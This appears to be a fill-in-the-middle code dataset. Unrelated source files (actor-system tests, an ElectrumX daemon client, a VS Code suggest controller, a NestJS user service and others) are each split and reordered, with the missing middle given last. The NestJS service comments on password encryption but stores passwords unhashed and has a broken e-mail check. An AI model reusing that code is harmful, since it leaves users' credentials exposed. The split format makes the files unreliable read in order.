asys.tell(handler2, 'Start')
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
assert 0 == asys.ask(handler2, 'Count', ASK_WAIT)
# Create actor and kill it so messages to it it will be dead-letter routed.
pawn = asys.createActor(DLHandler)
asys.tell(pawn, ActorExitRequest())
actor_exit_wait()
# Send a message ane make sure the later dead-letter handler receives it
cnt = 0
cnt2 = 0
asys.tell(pawn, 'hello')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
# Again, to ensure no round-robining is occurring
asys.tell(pawn, 'hi')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
# Now remove dead letter handler; ensure dead letters are dropped
asys.tell(handler2, ActorExitRequest())
actor_exit_wait()
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'another')
actor_do_stuff_wait()
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
# Tell first dead letter handler to re-register
asys.tell(handler, 'Start')
# n.b. tell or ask might create temporary actor, so can't assume startnum == 0
cnt = asys.ask(handler, 'Count', ASK_WAIT)
# Verify first dead letter handler is getting dead letters again
asys.tell(pawn, 'another again')
cnt = self.checkNewDLCount(asys, handler, cnt)
def test15_DLAutoRemoval(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLParent)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
handler2 = asys.createActor(DLParent)
asys.tell(handler2, 'Start')
actor_do_stuff_wait()
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
assert 0 == asys.ask(handler2, 'Count', ASK_WAIT)
# Create actor and kill it so messages to it it will be dead-letter routed.
pawn = asys.createActor(DLParent)
asys.tell(pawn, ActorExitRequest())
actor_exit_wait()
# Send a message and make sure the later dead-letter handler receives it
cnt = 0
cnt2 = 0
asys.tell(pawn, 'hello')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
# Again, to ensure no round-robining is occurring
asys.tell(pawn, 'hi')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
# Now remove dead letter handler; ensure dead letters are dropped
asys.tell(handler2, ActorExitRequest())
actor_exit_wait()
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'another')
actor_do_stuff_wait()
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
# Tell first dead letter handler to re-register
asys.tell(handler, 'Start')
actor_do_stuff_wait()
# n.b. tell or ask might create temporary actor, so can't assume startnum == 0
cnt = asys.ask(handler, 'Count', ASK_WAIT)
# Verify first dead letter handler is getting dead letters again
asys.tell(pawn, 'another again')
cnt = self.checkNewDLCount(asys, handler, cnt)
#KWQ: test multiple actor systems
| unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLParent)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Stop')
assert 0 == asys.ask(handler, 'Count', ASK_WAIT) |
daemon.py | # Copyright (c) 2016-2017, Neil Booth
#
# All rights reserved.
#
# See the file "LICENCE" for information about the copyright
# and warranty status of this software.
'''Class for handling asynchronous connections to a blockchain
daemon.'''
import asyncio
import itertools
import json
import time
import aiohttp
from aiorpcx import JSONRPC
from electrumx.lib.util import hex_to_bytes, class_logger
class DaemonError(Exception):
'''Raised when the daemon returns an error in its results.'''
class WarmingUpError(Exception):
'''Internal - when the daemon is warming up.'''
class ServiceRefusedError(Exception):
'''Internal - when the daemon doesn't provide a JSON response, only an HTTP error, for
some reason.'''
class Daemon(object):
'''Handles connections to a daemon at the given URL.'''
WARMING_UP = -28
id_counter = itertools.count()
def __init__(self, coin, url, *, max_workqueue=10, init_retry=0.25, max_retry=4.0):
self.coin = coin
self.logger = class_logger(__name__, self.__class__.__name__)
self.url_index = None
self.urls = []
self.set_url(url)
# Limit concurrent RPC calls to this number.
# See DEFAULT_HTTP_WORKQUEUE in bitcoind, which is typically 16
self.workqueue_semaphore = asyncio.Semaphore(value=max_workqueue)
self.init_retry = init_retry
self.max_retry = max_retry
self._height = None
self.available_rpcs = {}
self.session = None
async def __aenter__(self):
self.session = aiohttp.ClientSession(connector=self.connector())
return self
async def __aexit__(self, exc_type, exc_value, traceback):
await self.session.close()
self.session = None
def connector(self):
return None
def set_url(self, url):
'''Set the URLS to the given list, and switch to the first one.'''
urls = url.split(',')
urls = [self.coin.sanitize_url(url) for url in urls]
for n, url in enumerate(urls):
status = '' if n else ' (current)'
logged_url = self.logged_url(url)
self.logger.info(f'daemon #{n + 1} at {logged_url}{status}')
self.url_index = 0
self.urls = urls
def current_url(self):
'''Returns the current daemon URL.'''
return self.urls[self.url_index]
def logged_url(self, url=None):
'''The host and port part, for logging.'''
url = url or self.current_url()
return url[url.rindex('@') + 1:]
def failover(self):
'''Call to fail-over to the next daemon URL.
Returns False if there is only one, otherwise True.
'''
if len(self.urls) > 1:
self.url_index = (self.url_index + 1) % len(self.urls)
self.logger.info(f'failing over to {self.logged_url()}')
return True
return False
async def _send_data(self, data):
async with self.workqueue_semaphore:
async with self.session.post(self.current_url(), data=data) as resp:
kind = resp.headers.get('Content-Type', None)
if kind == 'application/json':
return await resp.json()
text = await resp.text()
text = text.strip() or resp.reason
raise ServiceRefusedError(text)
async def _send(self, payload, processor):
'''Send a payload to be converted to JSON.
Handles temporary connection issues. Daemon reponse errors
are raise through DaemonError.
'''
def log_error(error):
nonlocal last_error_log, retry
now = time.time()
if now - last_error_log > 60:
last_error_log = now
self.logger.error(f'{error}. Retrying occasionally...')
if retry == self.max_retry and self.failover():
retry = 0
on_good_message = None
last_error_log = 0
data = json.dumps(payload)
retry = self.init_retry
while True:
try:
result = await self._send_data(data)
result = processor(result)
if on_good_message:
self.logger.info(on_good_message)
return result
except asyncio.TimeoutError:
log_error('timeout error')
except aiohttp.ServerDisconnectedError:
log_error('disconnected')
on_good_message = 'connection restored'
except ConnectionResetError:
log_error('connection reset')
on_good_message = 'connection restored'
except aiohttp.ClientConnectionError:
log_error('connection problem - check your daemon is running')
on_good_message = 'connection restored'
except aiohttp.ClientError as e:
log_error(f'daemon error: {e}')
on_good_message = 'running normally'
except ServiceRefusedError as e:
log_error(f'daemon service refused: {e}')
on_good_message = 'running normally'
except WarmingUpError:
log_error('starting up checking blocks')
on_good_message = 'running normally'
await asyncio.sleep(retry)
retry = max(min(self.max_retry, retry * 2), self.init_retry)
async def _send_single(self, method, params=None):
'''Send a single request to the daemon.'''
def processor(result):
err = result['error']
if not err:
return result['result']
if err.get('code') == self.WARMING_UP:
raise WarmingUpError
raise DaemonError(err)
payload = {'method': method, 'id': next(self.id_counter)}
if params:
payload['params'] = params
return await self._send(payload, processor)
async def _send_vector(self, method, params_iterable, replace_errs=False):
'''Send several requests of the same method.
The result will be an array of the same length as params_iterable.
If replace_errs is true, any item with an error is returned as None,
otherwise an exception is raised.'''
def processor(result):
errs = [item['error'] for item in result if item['error']]
if any(err.get('code') == self.WARMING_UP for err in errs):
raise WarmingUpError
if not errs or replace_errs:
return [item['result'] for item in result]
raise DaemonError(errs)
payload = [{'method': method, 'params': p, 'id': next(self.id_counter)}
for p in params_iterable]
if payload:
return await self._send(payload, processor)
return []
async def _is_rpc_available(self, method):
'''Return whether given RPC method is available in the daemon.
Results are cached and the daemon will generally not be queried with
the same method more than once.'''
available = self.available_rpcs.get(method)
if available is None:
available = True
try:
await self._send_single(method)
except DaemonError as e:
err = e.args[0]
error_code = err.get("code")
available = error_code != JSONRPC.METHOD_NOT_FOUND
self.available_rpcs[method] = available
return available
async def | (self, first, count):
'''Return the hex hashes of count block starting at height first.'''
params_iterable = ((h, ) for h in range(first, first + count))
return await self._send_vector('getblockhash', params_iterable)
async def deserialised_block(self, hex_hash):
'''Return the deserialised block with the given hex hash.'''
return await self._send_single('getblock', (hex_hash, True))
async def raw_blocks(self, hex_hashes):
'''Return the raw binary blocks with the given hex hashes.'''
params_iterable = ((h, False) for h in hex_hashes)
blocks = await self._send_vector('getblock', params_iterable)
# Convert hex string to bytes
return [hex_to_bytes(block) for block in blocks]
async def mempool_hashes(self):
'''Update our record of the daemon's mempool hashes.'''
return await self._send_single('getrawmempool')
async def getnetworkinfo(self):
'''Return the result of the 'getnetworkinfo' RPC call.'''
return await self._send_single('getnetworkinfo')
async def getrawtransaction(self, hex_hash, verbose=False):
'''Return the serialized raw transaction with the given hash.'''
# Cast to int because some coin daemons are old and require it
return await self._send_single('getrawtransaction',
(hex_hash, int(verbose)))
async def getrawtransactions(self, hex_hashes, replace_errs=True):
'''Return the serialized raw transactions with the given hashes.
Replaces errors with None by default.'''
params_iterable = ((hex_hash, 0) for hex_hash in hex_hashes)
txs = await self._send_vector('getrawtransaction', params_iterable,
replace_errs=replace_errs)
# Convert hex strings to bytes
return [hex_to_bytes(tx) if tx else None for tx in txs]
async def broadcast_transaction(self, raw_tx):
'''Broadcast a transaction to the network.'''
return await self._send_single('sendrawtransaction', (raw_tx, ))
async def height(self):
'''Query the daemon for its current height.'''
self._height = await self._send_single('getblockcount')
return self._height
def cached_height(self):
'''Return the cached daemon height.
If the daemon has not been queried yet this returns None.'''
return self._height
| block_hex_hashes |
data_prep_helpers.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pandas as pd
def add_corona_dates(df, index_name, strategy=["during_corona", "no_corona"]):
| """
Inputs
------
strategy : List
division of datetimes based on stages of corona; acceptable strategies
are one of the following (order in list does not matter)
- ['during_corona', 'no_corona']
- ['pre_corona', 'during_corona', 'post_corona']
SOURCE
------
https://github.com/facebook/prophet/issues/1416#issuecomment-618553502
"""
d_corona = {
"BE": [
pd.to_datetime("2020-03-07 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"CH": [
pd.to_datetime("2020-03-07 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"CZ": [
pd.to_datetime("2020-03-14 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"DE": [
pd.to_datetime("2020-03-14 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"ES": [
pd.to_datetime("2020-03-14 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"FR": [
pd.to_datetime("2020-03-07 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"HR": [
pd.to_datetime("2020-03-21 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"IT": [
pd.to_datetime("2020-03-14 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"NL": [
pd.to_datetime("2020-03-14 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
"PL": [
pd.to_datetime("2020-03-14 00:00:00"),
pd.to_datetime("2020-04-12 23:00:00"),
],
}
df_corona = (
pd.DataFrame.from_dict(d_corona, orient="index")
.reset_index()
.rename(
columns={0: "corona_start", 1: "corona_end", "index": "country"}
)
)
df = df.merge(df_corona, on="country", how="left")
# Add corona periods based on specified strategy
strategies_dict = {
"dn": ["during_corona", "no_corona"],
"pdp": ["pre_corona", "during_corona", "post_corona"],
}
if set(strategy) == set(strategies_dict["dn"]):
df["no_corona"] = (df[index_name] < df["corona_start"]) | (
df[index_name] > df["corona_end"]
)
elif set(strategy) == set(strategies_dict["pdp"]):
df["pre_corona"] = df[index_name] < df["corona_start"]
df["post_corona"] = df[index_name] > df["corona_end"]
else:
strategies = ""
for _, v in strategies_dict.items():
strategies += "['" + "', '".join(map(str, v)) + "'], "
strategies = strategies.rstrip(", ")
raise Exception(
f"Unsupported corona strategy. Expected one of: {strategies}"
)
df["during_corona"] = (df[index_name] >= df["corona_start"]) & (
df[index_name] <= df["corona_end"]
)
return df |
|
suggestController.ts | /*---------------------------------------------------------------------------------------------
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See License.txt in the project root for license information.
*--------------------------------------------------------------------------------------------*/
'use strict';
import { alert } from 'vs/base/browser/ui/aria/aria';
import { isFalsyOrEmpty } from 'vs/base/common/arrays';
import { onUnexpectedError } from 'vs/base/common/errors';
import { KeyCode, KeyMod } from 'vs/base/common/keyCodes';
import { dispose, IDisposable } from 'vs/base/common/lifecycle';
import { ICodeEditor } from 'vs/editor/browser/editorBrowser';
import { EditorAction, EditorCommand, registerEditorAction, registerEditorCommand, registerEditorContribution, ServicesAccessor } from 'vs/editor/browser/editorExtensions';
import { EditOperation } from 'vs/editor/common/core/editOperation';
import { Range } from 'vs/editor/common/core/range';
import { IEditorContribution, ScrollType } from 'vs/editor/common/editorCommon';
import { EditorContextKeys } from 'vs/editor/common/editorContextKeys';
import { ISuggestSupport } from 'vs/editor/common/modes';
import { SnippetController2 } from 'vs/editor/contrib/snippet/snippetController2';
import { SnippetParser } from 'vs/editor/contrib/snippet/snippetParser';
import { SuggestMemories } from 'vs/editor/contrib/suggest/suggestMemory';
import * as nls from 'vs/nls';
import { ICommandService } from 'vs/platform/commands/common/commands';
import { ContextKeyExpr, IContextKeyService } from 'vs/platform/contextkey/common/contextkey';
import { IInstantiationService } from 'vs/platform/instantiation/common/instantiation';
import { KeybindingWeight } from 'vs/platform/keybinding/common/keybindingsRegistry';
import { ICompletionItem } from './completionModel';
import { Context as SuggestContext } from './suggest';
import { State, SuggestModel } from './suggestModel';
import { ISelectedSuggestion, SuggestWidget } from './suggestWidget';
class | {
private _disposables: IDisposable[] = [];
private _activeAcceptCharacters = new Set<string>();
private _activeItem: ISelectedSuggestion;
constructor(editor: ICodeEditor, widget: SuggestWidget, accept: (selected: ISelectedSuggestion) => any) {
this._disposables.push(widget.onDidShow(() => this._onItem(widget.getFocusedItem())));
this._disposables.push(widget.onDidFocus(this._onItem, this));
this._disposables.push(widget.onDidHide(this.reset, this));
this._disposables.push(editor.onWillType(text => {
if (this._activeItem) {
const ch = text[text.length - 1];
if (this._activeAcceptCharacters.has(ch) && editor.getConfiguration().contribInfo.acceptSuggestionOnCommitCharacter) {
accept(this._activeItem);
}
}
}));
}
private _onItem(selected: ISelectedSuggestion): void {
if (!selected || isFalsyOrEmpty(selected.item.suggestion.commitCharacters)) {
this.reset();
return;
}
this._activeItem = selected;
this._activeAcceptCharacters.clear();
for (const ch of selected.item.suggestion.commitCharacters) {
if (ch.length > 0) {
this._activeAcceptCharacters.add(ch[0]);
}
}
}
reset(): void {
this._activeItem = undefined;
}
dispose() {
dispose(this._disposables);
}
}
export class SuggestController implements IEditorContribution {
private static readonly ID: string = 'editor.contrib.suggestController';
public static get(editor: ICodeEditor): SuggestController {
return editor.getContribution<SuggestController>(SuggestController.ID);
}
private _model: SuggestModel;
private _widget: SuggestWidget;
private _memory: SuggestMemories;
private _toDispose: IDisposable[] = [];
private readonly _sticky = false; // for development purposes only
constructor(
private _editor: ICodeEditor,
@ICommandService private readonly _commandService: ICommandService,
@IContextKeyService private readonly _contextKeyService: IContextKeyService,
@IInstantiationService private readonly _instantiationService: IInstantiationService,
) {
this._model = new SuggestModel(this._editor);
this._memory = _instantiationService.createInstance(SuggestMemories, this._editor.getConfiguration().contribInfo.suggestSelection);
this._toDispose.push(this._model.onDidTrigger(e => {
if (!this._widget) {
this._createSuggestWidget();
}
this._widget.showTriggered(e.auto);
}));
this._toDispose.push(this._model.onDidSuggest(e => {
let index = this._memory.select(this._editor.getModel(), this._editor.getPosition(), e.completionModel.items);
this._widget.showSuggestions(e.completionModel, index, e.isFrozen, e.auto);
}));
this._toDispose.push(this._model.onDidCancel(e => {
if (this._widget && !e.retrigger) {
this._widget.hideWidget();
}
}));
this._toDispose.push(this._editor.onDidBlurEditorText(() => {
if (!this._sticky) {
this._model.cancel();
}
}));
// Manage the acceptSuggestionsOnEnter context key
let acceptSuggestionsOnEnter = SuggestContext.AcceptSuggestionsOnEnter.bindTo(_contextKeyService);
let updateFromConfig = () => {
const { acceptSuggestionOnEnter, suggestSelection } = this._editor.getConfiguration().contribInfo;
acceptSuggestionsOnEnter.set(acceptSuggestionOnEnter === 'on' || acceptSuggestionOnEnter === 'smart');
this._memory.setMode(suggestSelection);
};
this._toDispose.push(this._editor.onDidChangeConfiguration((e) => updateFromConfig()));
updateFromConfig();
}
private _createSuggestWidget(): void {
this._widget = this._instantiationService.createInstance(SuggestWidget, this._editor);
this._toDispose.push(this._widget.onDidSelect(this._onDidSelectItem, this));
// Wire up logic to accept a suggestion on certain characters
const autoAcceptOracle = new AcceptOnCharacterOracle(this._editor, this._widget, item => this._onDidSelectItem(item));
this._toDispose.push(
autoAcceptOracle,
this._model.onDidSuggest(e => {
if (e.completionModel.items.length === 0) {
autoAcceptOracle.reset();
}
})
);
let makesTextEdit = SuggestContext.MakesTextEdit.bindTo(this._contextKeyService);
this._toDispose.push(this._widget.onDidFocus(({ item }) => {
const position = this._editor.getPosition();
const startColumn = item.position.column - item.suggestion.overwriteBefore;
const endColumn = position.column;
let value = true;
if (
this._editor.getConfiguration().contribInfo.acceptSuggestionOnEnter === 'smart'
&& this._model.state === State.Auto
&& !item.suggestion.command
&& !item.suggestion.additionalTextEdits
&& item.suggestion.snippetType !== 'textmate'
&& endColumn - startColumn === item.suggestion.insertText.length
) {
const oldText = this._editor.getModel().getValueInRange({
startLineNumber: position.lineNumber,
startColumn,
endLineNumber: position.lineNumber,
endColumn
});
value = oldText !== item.suggestion.insertText;
}
makesTextEdit.set(value);
}));
this._toDispose.push({
dispose() { makesTextEdit.reset(); }
});
}
getId(): string {
return SuggestController.ID;
}
dispose(): void {
this._toDispose = dispose(this._toDispose);
if (this._widget) {
this._widget.dispose();
this._widget = null;
}
if (this._model) {
this._model.dispose();
this._model = null;
}
}
protected _onDidSelectItem(event: ISelectedSuggestion): void {
if (!event || !event.item) {
this._model.cancel();
return;
}
const { suggestion, position } = event.item;
const editorColumn = this._editor.getPosition().column;
const columnDelta = editorColumn - position.column;
// pushing undo stops *before* additional text edits and
// *after* the main edit
this._editor.pushUndoStop();
if (Array.isArray(suggestion.additionalTextEdits)) {
this._editor.executeEdits('suggestController.additionalTextEdits', suggestion.additionalTextEdits.map(edit => EditOperation.replace(Range.lift(edit.range), edit.text)));
}
// keep item in memory
this._memory.memorize(this._editor.getModel(), this._editor.getPosition(), event.item);
let { insertText } = suggestion;
if (suggestion.snippetType !== 'textmate') {
insertText = SnippetParser.escape(insertText);
}
SnippetController2.get(this._editor).insert(
insertText,
suggestion.overwriteBefore + columnDelta,
suggestion.overwriteAfter,
false, false,
!suggestion.noWhitespaceAdjust
);
this._editor.pushUndoStop();
if (!suggestion.command) {
// done
this._model.cancel();
} else if (suggestion.command.id === TriggerSuggestAction.id) {
// retigger
this._model.trigger({ auto: true }, true);
} else {
// exec command, done
this._commandService.executeCommand(suggestion.command.id, ...suggestion.command.arguments).then(undefined, onUnexpectedError);
this._model.cancel();
}
this._alertCompletionItem(event.item);
}
private _alertCompletionItem({ suggestion }: ICompletionItem): void {
let msg = nls.localize('arai.alert.snippet', "Accepting '{0}' did insert the following text: {1}", suggestion.label, suggestion.insertText);
alert(msg);
}
triggerSuggest(onlyFrom?: ISuggestSupport[]): void {
this._model.trigger({ auto: false }, false, onlyFrom);
this._editor.revealLine(this._editor.getPosition().lineNumber, ScrollType.Smooth);
this._editor.focus();
}
acceptSelectedSuggestion(): void {
if (this._widget) {
const item = this._widget.getFocusedItem();
this._onDidSelectItem(item);
}
}
cancelSuggestWidget(): void {
if (this._widget) {
this._model.cancel();
this._widget.hideWidget();
}
}
selectNextSuggestion(): void {
if (this._widget) {
this._widget.selectNext();
}
}
selectNextPageSuggestion(): void {
if (this._widget) {
this._widget.selectNextPage();
}
}
selectLastSuggestion(): void {
if (this._widget) {
this._widget.selectLast();
}
}
selectPrevSuggestion(): void {
if (this._widget) {
this._widget.selectPrevious();
}
}
selectPrevPageSuggestion(): void {
if (this._widget) {
this._widget.selectPreviousPage();
}
}
selectFirstSuggestion(): void {
if (this._widget) {
this._widget.selectFirst();
}
}
toggleSuggestionDetails(): void {
if (this._widget) {
this._widget.toggleDetails();
}
}
toggleSuggestionFocus(): void {
if (this._widget) {
this._widget.toggleDetailsFocus();
}
}
}
export class TriggerSuggestAction extends EditorAction {
static readonly id = 'editor.action.triggerSuggest';
constructor() {
super({
id: TriggerSuggestAction.id,
label: nls.localize('suggest.trigger.label', "Trigger Suggest"),
alias: 'Trigger Suggest',
precondition: ContextKeyExpr.and(EditorContextKeys.writable, EditorContextKeys.hasCompletionItemProvider),
kbOpts: {
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyMod.CtrlCmd | KeyCode.Space,
mac: { primary: KeyMod.WinCtrl | KeyCode.Space },
weight: KeybindingWeight.EditorContrib
}
});
}
public run(accessor: ServicesAccessor, editor: ICodeEditor): void {
const controller = SuggestController.get(editor);
if (!controller) {
return;
}
controller.triggerSuggest();
}
}
registerEditorContribution(SuggestController);
registerEditorAction(TriggerSuggestAction);
const weight = KeybindingWeight.EditorContrib + 90;
const SuggestCommand = EditorCommand.bindToContribution<SuggestController>(SuggestController.get);
registerEditorCommand(new SuggestCommand({
id: 'acceptSelectedSuggestion',
precondition: SuggestContext.Visible,
handler: x => x.acceptSelectedSuggestion(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyCode.Tab
}
}));
registerEditorCommand(new SuggestCommand({
id: 'acceptSelectedSuggestionOnEnter',
precondition: SuggestContext.Visible,
handler: x => x.acceptSelectedSuggestion(),
kbOpts: {
weight: weight,
kbExpr: ContextKeyExpr.and(EditorContextKeys.textInputFocus, SuggestContext.AcceptSuggestionsOnEnter, SuggestContext.MakesTextEdit),
primary: KeyCode.Enter
}
}));
registerEditorCommand(new SuggestCommand({
id: 'hideSuggestWidget',
precondition: SuggestContext.Visible,
handler: x => x.cancelSuggestWidget(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyCode.Escape,
secondary: [KeyMod.Shift | KeyCode.Escape]
}
}));
registerEditorCommand(new SuggestCommand({
id: 'selectNextSuggestion',
precondition: ContextKeyExpr.and(SuggestContext.Visible, SuggestContext.MultipleSuggestions),
handler: c => c.selectNextSuggestion(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyCode.DownArrow,
secondary: [KeyMod.CtrlCmd | KeyCode.DownArrow],
mac: { primary: KeyCode.DownArrow, secondary: [KeyMod.CtrlCmd | KeyCode.DownArrow, KeyMod.WinCtrl | KeyCode.KEY_N] }
}
}));
registerEditorCommand(new SuggestCommand({
id: 'selectNextPageSuggestion',
precondition: ContextKeyExpr.and(SuggestContext.Visible, SuggestContext.MultipleSuggestions),
handler: c => c.selectNextPageSuggestion(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyCode.PageDown,
secondary: [KeyMod.CtrlCmd | KeyCode.PageDown]
}
}));
registerEditorCommand(new SuggestCommand({
id: 'selectLastSuggestion',
precondition: ContextKeyExpr.and(SuggestContext.Visible, SuggestContext.MultipleSuggestions),
handler: c => c.selectLastSuggestion()
}));
registerEditorCommand(new SuggestCommand({
id: 'selectPrevSuggestion',
precondition: ContextKeyExpr.and(SuggestContext.Visible, SuggestContext.MultipleSuggestions),
handler: c => c.selectPrevSuggestion(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyCode.UpArrow,
secondary: [KeyMod.CtrlCmd | KeyCode.UpArrow],
mac: { primary: KeyCode.UpArrow, secondary: [KeyMod.CtrlCmd | KeyCode.UpArrow, KeyMod.WinCtrl | KeyCode.KEY_P] }
}
}));
registerEditorCommand(new SuggestCommand({
id: 'selectPrevPageSuggestion',
precondition: ContextKeyExpr.and(SuggestContext.Visible, SuggestContext.MultipleSuggestions),
handler: c => c.selectPrevPageSuggestion(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyCode.PageUp,
secondary: [KeyMod.CtrlCmd | KeyCode.PageUp]
}
}));
registerEditorCommand(new SuggestCommand({
id: 'selectFirstSuggestion',
precondition: ContextKeyExpr.and(SuggestContext.Visible, SuggestContext.MultipleSuggestions),
handler: c => c.selectFirstSuggestion()
}));
registerEditorCommand(new SuggestCommand({
id: 'toggleSuggestionDetails',
precondition: SuggestContext.Visible,
handler: x => x.toggleSuggestionDetails(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyMod.CtrlCmd | KeyCode.Space,
mac: { primary: KeyMod.WinCtrl | KeyCode.Space }
}
}));
registerEditorCommand(new SuggestCommand({
id: 'toggleSuggestionFocus',
precondition: SuggestContext.Visible,
handler: x => x.toggleSuggestionFocus(),
kbOpts: {
weight: weight,
kbExpr: EditorContextKeys.textInputFocus,
primary: KeyMod.CtrlCmd | KeyMod.Alt | KeyCode.Space,
mac: { primary: KeyMod.WinCtrl | KeyMod.Alt | KeyCode.Space }
}
}));
| AcceptOnCharacterOracle |
test_settings_mapping_extended.py | # coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
ref: https://github.com/swagger-api/swagger-codegen
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.models.settings_mapping_extended import SettingsMappingExtended
class TestSettingsMappingExtended(unittest.TestCase):
""" SettingsMappingExtended unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testSettingsMappingExtended(self):
|
if __name__ == '__main__':
unittest.main() | """
Test SettingsMappingExtended
"""
model = swagger_client.models.settings_mapping_extended.SettingsMappingExtended() |
usuario.service.ts |
import { UsuarioI } from './../interfaces/usuario.interface';
import { Injectable, Res, HttpStatus, Req, NotFoundException } from '@nestjs/common';
import { request, response, json } from 'express';
import { UsuarioC } from '../dto/usuario.dto';
import { InjectModel } from '@nestjs/mongoose';
import { Model } from "mongoose";
@Injectable()
export class | {
public usuario:UsuarioC[];
constructor(@InjectModel('Usuarios') private readonly uM :Model<UsuarioI>){}
async getUsuarios(@Res() res=response):Promise<any>{
try {
const usuarioDB = await this.uM.find();
return res.status(HttpStatus.OK).json({
ok:true,
usuarios:usuarioDB
});
} catch (error) {
console.log(error)
return res.status(HttpStatus.NOT_FOUND).json({
ok:false,
msg:'Error del servidor'
});
}
}
async getUsuario(@Res()res = response,id:string):Promise<any>{
try {
const usuarioDB = await this.uM.findById(id);
if(!usuarioDB){
return res.status(HttpStatus.NOT_FOUND).json({
ok:false,
msg:'el usuario no existe'
});
}
return res.status(HttpStatus.OK).json({
ok:true,
usuario:usuarioDB
})
} catch (error) {
console.log(error);
return res.status(HttpStatus.NOT_FOUND).json({
ok:false,
msg:'Error del servidor'
});
}
}
async postUsuario(@Req() req=request,@Res() res=response,usuario:UsuarioC):Promise<any>{
try {
//validacion de correo
const correo = usuario.correo;
const emailDB = await this.uM.findOne({correo});
if(emailDB){
return res.status(HttpStatus.UNAUTHORIZED).json({
ok:false,
msg:'El correo ya esta registrado'
});
}
//encriptacion de la contraseña
const usuarioDB = new this.uM(usuario);
await usuarioDB.save();
return res.status(HttpStatus.OK).json({
ok:true,
msg:'Usuario creado correctamente',
usuario:usuarioDB
})
} catch (error) {
console.log(error);
return res.status(HttpStatus.INTERNAL_SERVER_ERROR).json({
ok:false,
msg:'Error interno del servidor'
})
}
}
async putUsuario(@Req() req=request,@Res() res=response,usuario:UsuarioC, id:string):Promise<any>{
try {
//validacion del usuario
const idDB = await this.uM.findById(id);
if(!idDB){
return res.status(HttpStatus.UNAUTHORIZED).json({
ok:false,
msg:'El usuario no existe'
})
}
//validacion de correo
const correo = usuario.correo;
const emailDB = await this.uM.findOne({correo});
if(emailDB !== correo){
const correos = usuario.correo;
const emailDBs = await this.uM.findOne({correos});
if(emailDBs){
return res.status(HttpStatus.UNAUTHORIZED).json({
ok:false,
msg:'El correo ya esta registrado'
})
}
}
//actualización
const usuarioDB = await this.uM.findByIdAndUpdate(id,usuario,{new:true})
return res.status(HttpStatus.OK).json({
ok:true,
msg:'Usuario Actualizado correctamente',
usuario:usuarioDB
});
} catch (error) {
return res.status(HttpStatus.INTERNAL_SERVER_ERROR).json({
ok:false,
msg:'Error interno del servidor'
});
}
}
async deleteUsuario(@Req() req=request,@Res() res=response, id):Promise<any>{
try {
//validacion del usuario
const idDB = await this.uM.findById(id);
console.log(id);
if(!idDB){
return res.status(HttpStatus.UNAUTHORIZED).json({
ok:false,
msg:'El usuario no existe'
})
}
const usuarioDB = await this.uM.findByIdAndRemove(id);
return res.status(HttpStatus.OK).json({
ok:true,
msg:`El usuario con id ${id} fue eliminado correctamente`
})
} catch (error) {
return res.status(HttpStatus.INTERNAL_SERVER_ERROR).json({
ok:false,
msg:'Error interno del servidor'
})
}
}
}
| UsuarioService |
4-1-1.custom.function.py | from easygraphics.turtle import *
def arcl(side, degree):
for i in range(degree):
fd(side) | lt(1)
def arcr(side, degree):
for i in range(degree):
fd(side)
rt(1)
def main():
create_world(800, 600)
set_speed(50)
arcr(2, 90)
arcl(2, 90)
pause()
close_world()
easy_run(main) | |
signupUserProcess.js | import { UNPAID_STATE, WIZARD_ENABLED } from '../../constants';
import { API_CUSTOM_ERROR_CODES } from '../../errors';
/* @ngInject */
function | (
